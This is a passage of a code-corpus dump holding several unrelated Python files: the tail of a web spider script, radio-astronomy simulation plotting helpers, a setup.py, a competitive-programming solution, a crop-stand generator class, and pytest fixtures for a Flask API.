\\_/ \", file=sys.stderr)\n print(\" ______| | __|__ |_____/ |______ | \\_ . | | \", file=sys.stderr)\n if len(sys.argv) < 2: \n print('[-] No URL specified, using http://www.testfire.net/')\n base_url = 'http://www.testfire.net/'\n else:\n base_url = sys.argv[1]\n http = httplib2.Http('.cache')\n spider(http, base_url, base_url, [], [], max_depth)\n if not sys.stdout.isatty():\n print(' ',file=sys.stderr)\n\nif __name__ == '__main__':\n main()\n","sub_path":"spider3.py","file_name":"spider3.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"627059090","text":"\"\"\" Functions that help with SKA simulations\n\n\"\"\"\n\n__all__ = ['plot_visibility', 'plot_visibility_pol', 'find_times_above_elevation_limit', 'plot_uvcoverage',\n 'plot_azel', 'plot_gaintable', 'plot_pointingtable', 'find_pb_width_null',\n 'create_simulation_components', 'plot_pa']\n\nimport logging\n\nimport astropy.constants as constants\nimport astropy.units as units\nimport matplotlib.pyplot as plt\nimport numpy\nfrom astropy.coordinates import SkyCoord\n\nfrom rascil.data_models.memory_data_models import Skycomponent, BlockVisibility\nfrom rascil.data_models.polarisation import PolarisationFrame\nfrom rascil.processing_components.image import create_image\nfrom rascil.processing_components.image.operations import show_image\nfrom rascil.processing_components.imaging.primary_beams import create_pb\nfrom rascil.processing_components.skycomponent.base import copy_skycomponent\nfrom rascil.processing_components.skycomponent.operations import apply_beam_to_skycomponent, \\\n filter_skycomponents_by_flux\nfrom rascil.processing_components.util.coordinate_support import hadec_to_azel\nfrom rascil.processing_components.visibility.visibility_geometry import calculate_blockvisibility_hourangles, \\\n calculate_blockvisibility_azel, calculate_blockvisibility_parallactic_angles\n\nlog = logging.getLogger('logger')\n\n\ndef find_times_above_elevation_limit(start_times, end_times, location, phasecentre, elevation_limit):\n \"\"\" Find all times for which a phasecentre is above the elevation limit\n \n :param start_times:\n :param end_times:\n :param location:\n :param phasecentre:\n :param elevation_limit:\n :return:\n \"\"\"\n assert len(start_times) == len(end_times)\n \n def valid_elevation(time, location, phasecentre):\n ha = numpy.pi * time / 43200.0\n dec = phasecentre.dec.rad\n az, el = hadec_to_azel(ha, dec, location.lat.rad)\n return el > elevation_limit * numpy.pi / 180.0\n \n number_valid_times = 0\n valid_start_times = []\n for it, t in enumerate(start_times):\n if valid_elevation(start_times[it], location, phasecentre) or \\\n valid_elevation(end_times[it], location, phasecentre):\n valid_start_times.append(t)\n number_valid_times += 1\n \n assert number_valid_times > 0, \"No data above elevation limit\"\n \n log.info(\"find_times_above_elevation_limit: Start times for chunks above elevation limit:\")\n \n return valid_start_times\n\n\ndef plot_visibility(vis_list, title='Visibility', y='amp', x='uvdist', plot_file=None, plot_zero=False, *kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, 0]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, 0]).flat\n xvalue = vis.uvdist.flat\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color='b', markersize=0.2)\n if plot_zero:\n plt.plot(xvalue[yvalue == 0.0], yvalue[yvalue == 0.0], '.', color='r', markersize=0.2)\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\ndef plot_visibility_pol(vis_list, title='Visibility_pol', y='amp', x='uvdist', plot_file=None, **kwargs):\n \"\"\" Standard plot of visibility\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for ivis, vis in enumerate(vis_list):\n pols = vis.polarisation_frame.names\n colors = [\"red\", \"blue\", \"green\", \"purple\"]\n for pol in range(vis.vis.shape[-1]):\n if y == 'amp':\n yvalue = numpy.abs(vis.flagged_vis[..., 0, pol]).flat\n else:\n yvalue = numpy.angle(vis.flagged_vis[..., 0, pol]).flat\n if x==\"time\":\n xvalue = numpy.repeat(vis.time, len(yvalue))\n else:\n xvalue = vis.uvdist.flat\n if ivis == 0:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol],\n label=pols[pol])\n else:\n plt.plot(xvalue[yvalue > 0.0], yvalue[yvalue > 0.0], '.', color=colors[pol])\n\n plt.xlabel(x)\n plt.ylabel(y)\n plt.title(title)\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\n\ndef plot_uvcoverage(vis_list, ax=None, plot_file=None, title='UV coverage', **kwargs):\n \"\"\" Standard plot of uv coverage\n\n :param vis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n \n for ivis, vis in enumerate(vis_list):\n u = numpy.array(vis.u[...].flat)\n v = numpy.array(vis.v[...].flat)\n if isinstance(vis, BlockVisibility):\n k = (vis.frequency / constants.c).value\n u = numpy.array(numpy.outer(u, k).flat)\n v = numpy.array(numpy.outer(v, k).flat)\n plt.plot(u, v, '.', color='b', markersize=0.2)\n plt.plot(-u, -v, '.', color='b', markersize=0.2)\n else:\n k = vis.frequency / constants.c\n u = u * k\n v = v * k\n plt.plot(u.value, v.value, '.', color='b', markersize=0.2)\n plt.plot(-u.value, -v.value, '.', color='b', markersize=0.2)\n plt.xlabel('U (wavelengths)')\n plt.ylabel('V (wavelengths)')\n plt.title(title)\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_azel(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of az el coverage\n \n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2d = 180.0 / numpy.pi\n \n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n az, el = calculate_blockvisibility_azel(bvis)\n if ibvis == 0:\n plt.plot(ha, az.deg, '.', color='r', label='Azimuth (deg)')\n plt.plot(ha, el.deg, '.', color='b', label='Elevation (deg)')\n else:\n plt.plot(ha, az.deg, '.', color='r')\n plt.plot(ha, el.deg, '.', color='b')\n plt.xlabel('HA (hours)')\n plt.ylabel('Angle')\n plt.legend()\n plt.title('Azimuth and elevation vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pa(bvis_list, plot_file=None, **kwargs):\n \"\"\" Standard plot of parallactic angle coverage\n\n :param bvis_list:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n\n for ibvis, bvis in enumerate(bvis_list):\n ha = calculate_blockvisibility_hourangles(bvis).value\n pa = calculate_blockvisibility_parallactic_angles(bvis)\n if ibvis == 0:\n plt.plot(ha, pa.deg, '.', color='r', label='PA (deg)')\n else:\n plt.plot(ha, pa.deg, '.', color='r')\n plt.xlabel('HA (hours)')\n plt.ylabel('Parallactic Angle')\n plt.legend()\n plt.title('Parallactic angle vs hour angle')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_gaintable(gt_list, title='', value='amp', plot_file='gaintable.png', **kwargs):\n \"\"\" Standard plot of gain table\n \n :param gt_list:\n :param title:\n :param plot_file:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n for igt, gt in enumerate(gt_list):\n nrec = gt[0].nrec\n names = gt[0].receptor_frame.names\n if nrec > 1:\n recs = [0, 1]\n else:\n recs = [1]\n \n colors = ['r', 'b']\n for irec, rec in enumerate(recs):\n amp = numpy.abs(gt[0].gain[:, 0, 0, rec, rec])\n if value == 'phase':\n y = numpy.angle(gt[0].gain[:, 0, 0, rec, rec])\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], y[amp > 0.0], '.', color=colors[rec])\n else:\n y = amp\n if igt == 0:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec], label=names[rec])\n else:\n plt.plot(gt[0].time[amp > 0.0], 1.0 / y[amp > 0.0], '.', color=colors[rec])\n plt.title(title)\n plt.xlabel('Time (s)')\n plt.legend()\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef plot_pointingtable(pt_list, plot_file, title, **kwargs):\n \"\"\" Standard plot of pointing table\n \n :param pt_list:\n :param plot_file:\n :param title:\n :param kwargs:\n :return:\n \"\"\"\n plt.clf()\n r2a = 180.0 * 3600.0 / numpy.pi\n rms_az = 0.0\n rms_el = 0.0\n num = 0\n for pt in pt_list:\n num += len(pt.pointing[:, 0, 0, 0, 0])\n rms_az += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 0]) ** 2)\n rms_el += numpy.sum((r2a * pt.pointing[:, 0, 0, 0, 1]) ** 2)\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 0], '.', color='r')\n plt.plot(pt.time, r2a * pt.pointing[:, 0, 0, 0, 1], '.', color='b')\n \n rms_az = numpy.sqrt(rms_az / num)\n rms_el = numpy.sqrt(rms_el / num)\n plt.title(\"%s az, el rms %.2f %.2f (arcsec)\" % (title, rms_az, rms_el))\n plt.xlabel('Time (s)')\n plt.ylabel('Offset (arcsec)')\n if plot_file is not None:\n plt.savefig(plot_file)\n plt.show(block=False)\n\n\ndef find_pb_width_null(pbtype, frequency, **kwargs):\n \"\"\" Rough estimates of HWHM and null locations\n \n :param pbtype:\n :param frequency:\n :param kwargs:\n :return:\n \"\"\"\n if pbtype == 'MID':\n HWHM_deg = 0.596 * 1.36e9 / frequency[0]\n null_az_deg = 2.0 * HWHM_deg\n null_el_deg = 2.0 * HWHM_deg\n elif pbtype == 'MID_FEKO_B1':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_B2':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n elif pbtype == 'MID_FEKO_Ku':\n null_az_deg = 1.0779 * 1.36e9 / frequency[0]\n null_el_deg = 1.149 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n else:\n null_az_deg = 1.145 * 1.36e9 / frequency[0]\n null_el_deg = 1.145 * 1.36e9 / frequency[0]\n HWHM_deg = 0.447 * 1.36e9 / frequency[0]\n \n return HWHM_deg, null_az_deg, null_el_deg\n\n\ndef create_simulation_components(context, phasecentre, frequency, pbtype, offset_dir, flux_limit,\n pbradius, pb_npixel, pb_cellsize, show=False, fov=10,\n polarisation_frame=PolarisationFrame(\"stokesI\"),\n filter_by_primary_beam=True, flux_max=10.0):\n \"\"\" Construct components for simulation\n \n :param context: singlesource or null or s3sky\n :param phasecentre: Centre of components\n :param frequency: Frequency\n :param pbtype: Type of primary beam\n :param offset_dir: Offset in ra, dec degrees\n :param flux_limit: Lower limit flux\n :param pbradius: Radius of components in radians\n :param pb_npixel: Number of pixels in the primary beam model\n :param pb_cellsize: Cellsize in primary beam model\n :param fov: FOV in degrees (used to select catalog)\n :param flux_max: Maximum flux in model before application of primary beam\n :param filter_by_primary_beam: Filter components by primary beam\n :param polarisation_frame:\n :param show:\n\n :return:\n \"\"\"\n \n HWHM_deg, null_az_deg, null_el_deg = find_pb_width_null(pbtype, frequency)\n \n dec = phasecentre.dec.deg\n ra = phasecentre.ra.deg\n \n if context == 'singlesource':\n log.info(\"create_simulation_components: Constructing single component\")\n offset = [HWHM_deg * offset_dir[0], HWHM_deg * offset_dir[1]]\n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n # The point source is offset to approximately the halfpower point\n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n offset_direction = odirection\n \n elif context == 'doublesource':\n \n original_components = []\n \n log.info(\"create_simulation_components: Constructing double components\")\n \n for sign_offset in [(-1, 0), (1, 0)]:\n offset = [HWHM_deg * sign_offset[0], HWHM_deg * sign_offset[1]]\n \n log.info(\n \"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (\n offset[0], offset[1]))\n \n odirection = SkyCoord(\n ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n if polarisation_frame.type == \"stokesIQUV\":\n original_components.append(\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV')))\n else:\n original_components.append(\n Skycomponent(flux=[[1.0]], direction=odirection, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI')))\n \n for o in original_components:\n print(o)\n \n offset_direction = odirection\n \n elif context == 'null':\n log.info(\"create_simulation_components: Constructing single component at the null\")\n \n offset = [null_az_deg * offset_dir[0], null_el_deg * offset_dir[1]]\n HWHM = HWHM_deg * numpy.pi / 180.0\n \n log.info(\"create_simulation_components: Offset from pointing centre = %.3f, %.3f deg\" % (offset[0], offset[1]))\n \n # The point source is offset to approximately the null point\n offset_direction = SkyCoord(ra=(ra + offset[0] / numpy.cos(numpy.pi * dec / 180.0)) * units.deg,\n dec=(dec + offset[1]) * units.deg,\n frame='icrs', equinox='J2000')\n \n if polarisation_frame.type == \"stokesIQUV\":\n original_components = [\n Skycomponent(flux=[[1.0, 0.0, 0.0, 0.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesIQUV'))]\n else:\n original_components = [\n Skycomponent(flux=[[1.0]], direction=offset_direction, frequency=frequency,\n polarisation_frame=PolarisationFrame('stokesI'))]\n \n else:\n offset = [0.0, 0.0]\n # Make a skymodel from S3\n max_flux = 0.0\n total_flux = 0.0\n log.info(\"create_simulation_components: Constructing s3sky components\")\n from rascil.processing_components.simulation import create_test_skycomponents_from_s3\n \n all_components = create_test_skycomponents_from_s3(flux_limit=flux_limit / 100.0,\n phasecentre=phasecentre,\n polarisation_frame=polarisation_frame,\n frequency=numpy.array(frequency),\n radius=pbradius,\n fov=fov)\n original_components = filter_skycomponents_by_flux(all_components, flux_max=flux_max)\n log.info(\"create_simulation_components: %d components before application of primary beam\" %\n (len(original_components)))\n \n\n \n if filter_by_primary_beam:\n pbmodel = create_image(npixel=pb_npixel,\n cellsize=pb_cellsize,\n phasecentre=phasecentre,\n frequency=frequency,\n polarisation_frame=PolarisationFrame(\"stokesI\"))\n stokesi_components = [copy_skycomponent(o) for o in original_components]\n for s in stokesi_components:\n s.flux = numpy.array([[s.flux[0, 0]]])\n s.polarisation_frame = PolarisationFrame(\"stokesI\")\n \n pb = create_pb(pbmodel, \"MID_GAUSS\", pointingcentre=phasecentre, use_local=False)\n pb_applied_components = [copy_skycomponent(c) for c in stokesi_components]\n pb_applied_components = apply_beam_to_skycomponent(pb_applied_components, pb)\n filtered_components = []\n for icomp, comp in enumerate(pb_applied_components):\n if comp.flux[0, 0] > flux_limit:\n total_flux += comp.flux[0, 0]\n if abs(comp.flux[0, 0]) > max_flux:\n max_flux = abs(comp.flux[0, 0])\n filtered_components.append(original_components[icomp])\n log.info(\"create_simulation_components: %d components > %.3f Jy after filtering with primary beam\" %\n (len(filtered_components), flux_limit))\n log.info(\"create_simulation_components: Strongest components is %g (Jy)\" % max_flux)\n log.info(\"create_simulation_components: Total flux in components is %g (Jy)\" % total_flux)\n original_components = [copy_skycomponent(c) for c in filtered_components]\n if show:\n plt.clf()\n show_image(pb, components=original_components)\n plt.show(block=False)\n \n log.info(\"create_simulation_components: Created %d components\" % len(original_components))\n # Primary beam points to the phasecentre\n offset_direction = SkyCoord(ra=ra * units.deg, dec=dec * units.deg, frame='icrs',\n equinox='J2000')\n \n return original_components, offset_direction\n","sub_path":"rascil/processing_components/simulation/simulation_helpers.py","file_name":"simulation_helpers.py","file_ext":"py","file_size_in_byte":18987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"328187947","text":"# coding=utf-8\nfrom setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='request_log_info',\n version='1.0.0',\n description='',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author='zhangruyu',\n author_email='1582034460@qq.com',\n license=\"BSD\",\n url='https://github.com/zhangruyu/request_log_info',\n packages=find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n ],\n)\n\n# python setup.py sdist buil\n# python setup.py sdist buil\n","sub_path":"pypi_install_script/request_log_info-1.0.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"29646810","text":"'''\n#!/usr/bin/python\n\ndef ia(): return map(int, raw_input().split())\n\nn, k = ia()\np = ia()\nc = ia()\n\nh = []\nP = zip(p, c, xrange(n))\nP.sort()\n\nlst = [None] * n\nh = []\nfor p, c, i in P:\n ans = c + sum(h)\n lst[i] = ans\n h.append(c)\n h.sort(reverse=True)\n h = h[:k]\n\nprint \" \".join(map(str, lst))\n\n4 2\n4 5 9 7\n1 2 11 33\n'''\nnk, k = [int(x) for x in input().split()]\nknights = [int(x) for x in input().split()]\ncoins = [int(x) for x in input().split()]\n\ndata = sorted(zip(knights, coins, range(nk)))\nhave = [0] * nk\nselected = []\nfor p, c, i in data:\n ans = c + sum(selected)\n have[i] = ans\n selected.append(c)\n selected = sorted(selected, reverse=True)[:k]\nprint(*have)\n\n\n\n\n\n\n","sub_path":"CodeForces/488_B_knightsOfPolygonTable.py","file_name":"488_B_knightsOfPolygonTable.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"309512585","text":"\"\"\"\r\nClass interface for stand generation\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nfrom random import sample\r\nfrom scipy.interpolate import interp1d\r\n\r\nfrom alinea.adel.stand.stand import agronomicplot, regular_plot\r\n\r\nclass AgronomicStand(object):\r\n \r\n def __init__(self, sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n self.sowing_density = sowing_density\r\n self.inter_row = inter_row\r\n self.plant_density = plant_density\r\n self.inter_plant = 1. / inter_row / sowing_density\r\n self.noise = noise\r\n df = density_curve_data\r\n if df is None:\r\n self.density_curve=None\r\n else:\r\n #hs_curve = interp1d(df['HS'], df['density'])\r\n TT_curve = interp1d(df['TT'], df['density'])\r\n #self.density_curve = {'hs_curve':hs_curve,'TT_curve':TT_curve}\r\n self.density_curve = TT_curve\r\n \r\n \r\n \r\n def plot_dimensions(self, nplants =1, aspect = 'square'):\r\n \r\n if aspect =='square':\r\n side = sqrt(1. / self.sowing_density * nplants)\r\n nrow = max(1, round(side / self.inter_row))\r\n plant_per_row = max(1, round(side / self.inter_plant)) \r\n plot_length = self.inter_plant * plant_per_row\r\n plot_width = self.inter_row * nrow\r\n return plot_length, plot_width\r\n elif aspect == 'line':\r\n plot_width = self.inter_row \r\n plot_length = nplants * self.inter_plant * self.sowing_density / float(self.plant_density) if self.plant_density > 0. else 0.\r\n return plot_length, plot_width \r\n else:\r\n return 0.5, 0.5\r\n \r\n def smart_stand(self, nplants=1, at=None):\r\n \"\"\" return an (almost) square stand that match inter-row, current density and nplants in the stand, \r\n but (dynamicaly) adjusting inter-plant to solve the problem\r\n \"\"\"\r\n \r\n density = self.plant_density\r\n if at is not None:\r\n if self.density_curve is not None:\r\n density = self.density_curve(at)\r\n \r\n # find a square design for sowing\r\n nsown = nplants * 1. * self.sowing_density / density\r\n side = sqrt(1. / self.sowing_density * nsown)\r\n nrow = int(max(1, round(side / self.inter_row)))\r\n plant_per_row = int(max(1, round(float(nsown) / nrow)))\r\n while nplants > (nrow * plant_per_row):\r\n plant_per_row += 1\r\n domain_area = nrow * self.inter_row * plant_per_row * self.inter_plant\r\n # adjust inter_plant spacing so that n_emerged / domain_area match plant density \r\n n_emerged = int(round(domain_area * density))\r\n #assert(n_emerged >= nplants)\r\n n_emerged = nplants\r\n target_domain_area = 1. * n_emerged / density\r\n inter_plant = target_domain_area / (plant_per_row * nrow * self.inter_row) \r\n \r\n positions, domain, domain_area = regular_plot(inter_plant, self.inter_row, nrow, plant_per_row, noise=self.noise)\r\n\r\n positions = sample(positions, nplants)\r\n return nplants, domain, positions, domain_area\r\n \r\n \r\n def stand(self, nplants = 1, aspect='square'):\r\n \r\n length, width = self.plot_dimensions(nplants, aspect)\r\n n_emerged, positions, domain, domain_area, convUnit = agronomicplot(length, width, self.sowing_density, self.plant_density, self.inter_row, noise=self.noise)\r\n \r\n return n_emerged, domain, positions, length * width\r\n \r\n def plot(self, positions):\r\n import pandas\r\n \r\n df = pandas.DataFrame(positions)\r\n df.plot(0,1,style='o')\r\n \r\n \r\ndef agronomicStand_node(sowing_density=10, plant_density=10, inter_row=0.8, noise=0, density_curve_data=None):\r\n return AgronomicStand(**locals())","sub_path":"adel/Stand.py","file_name":"Stand.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"48756783","text":"import os\nimport subprocess\nimport datetime\n\nfrom bs4 import BeautifulSoup\n\nimport pytest\nfrom alembic.command import upgrade\nfrom alembic.config import Config\nfrom flask_migrate import Migrate, MigrateCommand\nfrom flask_script import Manager\nimport sqlalchemy\nfrom flask_jwt_extended import create_access_token, create_refresh_token\n\nfrom app import create_app, db as _db, get_env\nfrom app.models import EVENT\nfrom tests.db import (\n create_article,\n create_email,\n create_event,\n create_event_date,\n create_event_type,\n create_fee,\n create_marketing,\n create_member,\n create_reject_reason,\n create_speaker,\n create_user,\n create_venue\n)\n\nTEST_DATABASE_URI = \"postgresql://localhost/na_api_\" + get_env() + '_test'\nTEST_ADMIN_USER = 'admin@example.com'\nTEST_ADMIN_USER_CONFIG = 'admin-config@example.com'\n\n\n@pytest.yield_fixture(scope='session')\ndef app():\n _app = create_app(**{\n 'TESTING': True,\n 'ENVIRONMENT': 'test',\n 'SQLALCHEMY_DATABASE_URI': TEST_DATABASE_URI,\n 'PREFERRED_URL_SCHEME': 'http',\n 'ADMIN_CLIENT_ID': 'testadmin',\n 'ADMIN_CLIENT_SECRET': 'testsecret',\n 'TOKEN_EXPIRY': 1,\n 'JWT_SECRET_KEY': 'secret',\n 'ADMIN_USERS': [TEST_ADMIN_USER_CONFIG],\n 'EMAIL_DOMAIN': 'example.com',\n 'EMAIL_TOKENS': {\"member_id\": \"memberid\", \"type\": \"typeid\"},\n 'EMAIL_SALT': 'test',\n 'EMAIL_UNSUB_SALT': 'unsub_test',\n 'TEST_EMAIL': 'test@example.com',\n 'EVENTS_MAX': 2,\n 'PROJECT': 'test-project',\n 'STORAGE': 'test-store',\n 'PAYPAL_URL': 'https://test.paypal',\n 'PAYPAL_USER': 'seller@test.com',\n 'PAYPAL_PASSWORD': 'test pass',\n 'PAYPAL_SIG': 'paypal signature',\n 'PAYPAL_RECEIVER': 'receiver@example.com',\n 'PAYPAL_VERIFY_URL': 'https://test.paypal/verify',\n 'API_BASE_URL': 'http://test',\n 'FRONTEND_URL': 'http://frontend-test',\n 'FRONTEND_ADMIN_URL': 'http://frontend-test/admin',\n 'CELERY_BROKER_URL': 'http://mock-celery',\n 'EMAIL_DELAY': 60\n })\n\n ctx = _app.app_context()\n ctx.push()\n\n yield _app\n\n ctx.pop()\n\n\n@pytest.fixture(scope='session')\ndef db(app):\n assert _db.engine.url.database.endswith('_test'), 'dont run tests against main db'\n\n create_test_db_if_does_not_exist(_db)\n\n Migrate(app, _db)\n Manager(_db, MigrateCommand)\n BASE_DIR = os.path.dirname(os.path.dirname(__file__))\n ALEMBIC_CONFIG = os.path.join(BASE_DIR, 'migrations')\n config = Config(ALEMBIC_CONFIG + '/alembic.ini')\n config.set_main_option(\"script_location\", ALEMBIC_CONFIG)\n\n with app.app_context():\n upgrade(config, 'head')\n\n yield _db\n\n _db.session.remove()\n _db.get_engine(app).dispose()\n\n\n@pytest.fixture(scope='function')\ndef db_session(db):\n yield db\n\n db.session.remove()\n for tbl in reversed(db.metadata.sorted_tables):\n if tbl.name not in [\"event_states\", \"email_types\", \"email_states\", \"ticket_types\", \"ticket_statuses\"]:\n db.engine.execute(tbl.delete())\n db.session.commit()\n\n\n@pytest.fixture(scope='function')\ndef sample_article(db):\n return create_article(title='Ancient Greece')\n\n\n@pytest.fixture(scope='function')\ndef sample_email(db):\n return create_email(\n details='Fees: 10, Concessions: 5',\n created_at='2019-06-01',\n expires='2019-07-01'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_marketing(db):\n return create_marketing(\n old_id=1,\n description='Leaflet'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_member(db):\n return create_member(\n name='Sue Green',\n email='sue@example.com'\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event(db):\n return create_event(title='test_title', description='test description')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_with_dates(db, sample_event_date_without_event):\n another_event_date = create_event_date(event_datetime='2018-01-02 19:00')\n return create_event(\n title='test_title',\n description='test description',\n event_dates=[sample_event_date_without_event, another_event_date]\n )\n\n\n@pytest.fixture(scope='function')\ndef sample_event_type(db):\n return create_event_type(event_type='short course')\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date(db, sample_event):\n return create_event_date(event_id=sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_event_date_without_event(db):\n return create_event_date()\n\n\n@pytest.fixture(scope='function')\ndef sample_fee(db, sample_event_type):\n return create_fee(fee=5, conc_fee=3, event_type_id=sample_event_type.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_reject_reason(db, sample_event):\n return create_reject_reason(sample_event.id)\n\n\n@pytest.fixture(scope='function')\ndef sample_speaker(db):\n return create_speaker(name='Paul White')\n\n\n@pytest.fixture(scope='function')\ndef sample_user(db):\n return create_user(email='test_user@example.com', name='Test User')\n\n\n@pytest.fixture(scope='function')\ndef sample_admin_user(db):\n return create_user(email=TEST_ADMIN_USER, name='Admin User', access_area='admin')\n\n\n@pytest.fixture(scope='function')\ndef sample_venue(db):\n return create_venue()\n\n\n# token set around 2017-12-10T23:10:00\n@pytest.fixture(scope='function')\ndef sample_decoded_token():\n start, expiry = get_unixtime_start_and_expiry()\n\n return {\n 'jti': 'test',\n 'exp': expiry,\n 'iat': start,\n 'fresh': False,\n 'type': 'access',\n 'nbf': start,\n 'identity': 'admin'\n }\n\n\n@pytest.fixture\ndef sample_uuid():\n return '42111e2a-c990-4d38-a785-394277bbc30c'\n\n\ndef create_test_db_if_does_not_exist(db):\n try:\n conn = db.engine.connect()\n conn.close()\n\n except sqlalchemy.exc.OperationalError as e:\n if 'database \"{}\" does not exist'.format(TEST_DATABASE_URI.split('/')[-1:][0]) in e.message:\n db_url = sqlalchemy.engine.url.make_url(TEST_DATABASE_URI)\n dbname = db_url.database\n\n if db_url.drivername == 'postgresql':\n subprocess.call(['/usr/bin/env', 'createdb', dbname])\n else:\n raise\n\n\ndef request(url, method, data=None, headers=None):\n r = method(url, data=data, headers=headers)\n r.soup = BeautifulSoup(r.get_data(as_text=True), 'html.parser')\n return r\n\n\ndef create_authorization_header(client_id='testadmin'):\n expires = datetime.timedelta(minutes=1)\n\n token = create_access_token(identity=client_id, expires_delta=expires)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef create_refresh_header(client_id='testadmin'):\n token = create_refresh_token(identity=client_id)\n return 'Authorization', 'Bearer {}'.format(token)\n\n\ndef get_unixtime_start_and_expiry(year=2017, month=12, day=10, hour=23, minute=10):\n from time import mktime\n d = datetime.datetime(year, month, day, hour, minute, 0)\n unixtime = mktime(d.timetuple())\n\n added_time = 900\n unixtime_expiry = unixtime + added_time\n return unixtime, unixtime_expiry\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
